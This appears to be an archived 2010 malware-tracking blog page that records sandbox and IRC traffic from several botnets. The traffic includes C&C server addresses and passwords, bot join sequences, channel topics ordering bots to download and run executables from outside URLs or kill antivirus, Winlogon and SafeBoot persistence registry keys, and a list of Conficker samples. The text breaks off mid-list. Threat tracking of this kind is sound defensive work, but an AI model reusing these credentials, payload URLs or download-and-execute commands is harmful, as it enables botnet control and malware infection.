Month: November 2010

178.211.53.6

Remote Host Port Number
178.211.53.6 9595
PASS prison
72.233.89.199 80
91.198.22.71 80
PONG leaf.35204.com
NICK {iNF-00-USA-XP-COMP-6996}
USER MEAT * 0 :COMP
JOIN ###mini
NICK {00-USA-XP-COMP-5663}
Now talking in ###mini
Topic On: [ ###mini ] [ .banner ]
Topic By: [ pe[ro ]
Modes On: [ ###mini ] [ +smntu ]
Other details
* The following

reportaboutbosn.com

reportaboutbosn.com 91.217.162.174
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1043
Send Datagram: 2 packet(s) of size 1
Recv Datagram: 2 packet(s) of size 1
Download URLs
http://91.217.162.174/inst.php?id=abs_01 (reportaboutbosn.com)
Outgoing connection to remote server: reportaboutbosn.com TCP port 80
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hotfix.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

xdrone.sytes.net

Remote Host Port Number
129.7.211.61 7537
Resolved : [xdrone.sytes.net] To [129.7.211.61]
NICK carnern
SILENCE +*!*@*,~*!*@*undernet.org,~*!*@*.ro
MODE hanglyb +iwx
NICK harbaughz
USER havoc "" "xdrone.sytes.net" :Who's Peer & why did he reset my connection?
MODE #drone
NICK :disneyv
MODE harbaughz +i
USER bowker "" "xdrone.sytes.net" :Press any key to continue or any other key to quit...

124.217.229.162

Remote Host Port Number
124.217.229.162 83
PASS letmein
NICK [00-USA-XP-3036431]
USER SP2-ilm * 0 :COMPUTERNAME
Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WM System Decode Application
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\WM System Decode Application
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SYSDRV32
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SYSDRV32\000
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SYSDRV32\000\Control
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WM_SYSTEM_DECODE_APPLICATION
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WM_SYSTEM_DECODE_APPLICATION\000
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WM_SYSTEM_DECODE_APPLICATION\000\Control
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sysdrv32
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sysdrv32\Security
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\sysdrv32\Enum
  o HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WM System

125.17.135.163 (cC-Team united lamers botnet)

Remote Host Port Number
125.17.135.163 6667
PASS blah
NICK fawrqd
USER pscebs "" "btj" :pscebs
PONG :EF4570FF
JOIN #cC-Team x0r
PONG :irc.flaw.net
Invisible Users: 786
Channels: 14 channels formed
Clients: I have 810 clients and 0 servers
Local users: Current Local Users: 810 Max: 1185
Global users: Current Global Users: 810 Max: 1052
Registry Modifications

unknown malware

Three domains were found for this malware, and multiple tasks are called from the same exe file. The exe was uploaded by mysterii.
DNS:
verseuable.com: type A, class IN, addr 64.191.16.70
twindu.net: type A, class IN, addr 77.120.109.3
cogiicio.com: type A, class IN, addr 87.255.51.229
HTTP:
Data: POST /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== HTTP/1.1
RAW: ..'.?...'..K..E..-.R@...^...o.@..F.O.PQ..2....P.......POST /bugatti.php?ini=v22Mm2fmToX7DzVq7FBHROc/POW6dtZpa4xZTXQhKB9UBFbWihPdnz2vDFrHIQqMgMqV7MpGegiBMF4YGmLzfIyRtufQpaX/NPtque7okw== HTTP/1.1..Content-Type:application/x-www-form-urlencoded..Host: verseuable.com..User-Agent: Mozilla/6.0 (Windows; wget3.0)..Content-Length:

tux.shannen.cc (OGARD.EDUCATIONAL.Gov Crew aka VirUs 80k net)

Remote Host Port Number
70.38.98.239 80
92.243.24.240 5900
PASS Virus
NICK VirUs-sgvyxgjf
USER VirUs "" "dah" : 8Coded 8VirUs..
JOIN #THeRaNdOm4# Virus
PRIVMSG #THeRaNdOm4# :Success.
PONG :OGARD.EDUCATIONAL.Gov
Now talking in #THeRaNdOm4#
Topic On: [ #THeRaNdOm4# 12] [ !NAZELlol http://img105.herosh.com/2010/11/11/555028723.gif Hajni12.exe 1 ]
Topic By: [ Somebody ]
tux.shannen.cc 92.243.24.240 0 127.0.0.1 fastwebinfo.com fastwebinfo.com 66.96.217.24 promoup.info

nice.niceshot.in

nice.niceshot.in 67.202.108.14
C&C Server: 67.202.108.14:6567
Server Password:
Username: XP-5109
Nickname: [SI|DEU|00|P|07356]
Channel: #update# (Password: c1rc0dus0leil)
Channeltopic: :.updbin http://www.ahava.lt/ali.exe
Username: XP-1820
Nickname: [SI|DEU|00|P|47468]
Channel: #cricri# (Password: c1rc0dus0leil)
Channeltopic:
nice.niceshot.in 67.202.108.130
C&C Server: 67.202.108.130:6567
Server Password:
Username: XP-3473
Nickname: [SI|DEU|00|P|06553]
Channel: #csm# (Password: c1rc0dus0leil)
Channeltopic: :.austinupdate http://www.minka.com.pe/wp-includes/js/crap.exe
MODE [SI|USA|00|P|82252] -ix
JOIN #perurlz# c1rc0dus0leil
PRIVMSG #perurlz# :[Dl]: File

tep.xylocomod.com (Ganja2.2)

tep.xylocomod.com 66.96.240.101
Remote Host Port Number
66.96.240.101 9009
NICK n{USA|XP}430851
USER 4308 "" "TsGh" :4308
JOIN ##kuwait## 112211
PRIVMSG ##kuwait## :New Infection! Ganja 2.2 Executed!
Now talking in ##kuwait##
Topic On: [ ##kuwait## ] [ !dl http://fagermoshreq.100free.com/win win.exe 1 | !av.kill | !clean ]
Topic By: [ X ]
Other details
* The following port

20 MB exe files from different Conficker worm versions

The package contains 20 MB of executable files from different versions of Conficker. A little information about the Conficker variants:
C:\Documents and Settings\Administrator\My Documents\Downloads\last1\22830b424d88664cc3576941dd9841f9 – Win32/Conficker.AA worm
C:\Documents and Settings\Administrator\My Documents\Downloads\last1\24199a5b981fd5a3d846d3f9d4c1d574 – Win32/Conficker.AA worm
C:\Documents and Settings\Administrator\My Documents\Downloads\last1\260722ac0e512e73f6c16ebe87229bea – a variant of Win32/Conficker.X worm
C:\Documents and Settings\Administrator\My Documents\Downloads\last1\2656e272e85a25caaece4591e24b4d35 – a variant of Win32/Conficker.X worm
C:\Documents and Settings\Administrator\My Documents\Downloads\last1\2724c68f973e4e35391849cfb5259f86 –